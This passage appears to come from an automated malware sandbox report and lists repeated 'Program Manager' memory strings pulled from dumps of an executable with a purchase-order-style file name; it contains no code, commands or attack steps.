                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTS
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qts
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4a
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4_
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT~
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4\
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTz
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4Z
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4g
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4f
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx)
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4e
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4M
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4W
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX%
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxA
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX-
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4n
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4m
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx:
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4t
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4r
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP=
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpV
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP,
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpJ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP)
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP(
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpR
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpO
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0=
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp{
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP[
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpz
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0D
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPc
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0B
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPb
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPa
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp~
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpl
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpj
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPJ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpi
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpu
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qps
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPS
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0\
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPm
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0F
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0R
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0P
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPo
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0O
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0N
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtG
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT'
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtE
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtC
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0l
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0k
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0j
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt-
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0g
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0f
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0t
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0r
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0p
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL7
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlW
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlV
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlT
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql[
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlF
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlC
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlJ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql|
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlz
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,"
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLB
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLM
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qll
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLL
